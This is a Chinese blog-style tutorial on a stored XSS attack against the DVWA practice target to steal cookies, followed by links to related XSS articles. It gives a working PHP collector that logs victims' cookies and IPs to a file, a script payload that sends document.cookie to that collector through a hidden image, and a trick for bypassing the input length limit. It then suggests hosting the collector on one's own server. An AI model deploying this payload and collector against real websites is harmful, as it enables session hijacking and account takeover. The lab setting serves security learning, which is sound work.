存储xss实现获取cookie(本地实战)

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

相关推荐
玥轩_52115 小时前
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储型 XSS)
安全·web安全·网络安全·php·xss·dvwa
点燃银河尽头的篝火(●'◡'●)1 天前
【BurpSuite】Cross-site scripting (XSS 学徒部分:1-9)
前端·web安全·网络安全·xss
Dovir多多5 天前
渗透测试入门学习——php表单form与POST、GET请求练习
学习·安全·web安全·网络安全·系统安全·php·xss
运维Z叔8 天前
利用shuji还原webpack打包源码
服务器·前端·webpack·node.js·postman·xss·csrf
刘鑫磊up9 天前
[Web安全 网络安全]-XSS跨脚本攻击
安全·web安全·xss
二川bro13 天前
前端XSS 攻击与SQL注入 处理
前端·sql·xss
不会代码的小徐15 天前
【网络安全】如何预防xss
安全·web安全·xss
运维Z叔15 天前
通过组合Self-XSS + CSRF得到存储型XSS
java·服务器·前端·spring·xss·csrf·漏洞挖掘
oliveira-time15 天前
xss.haozi.me
前端·xss
谷隐凡二15 天前
XSS和sql注入部分场景测试用例样例
sql·测试用例·xss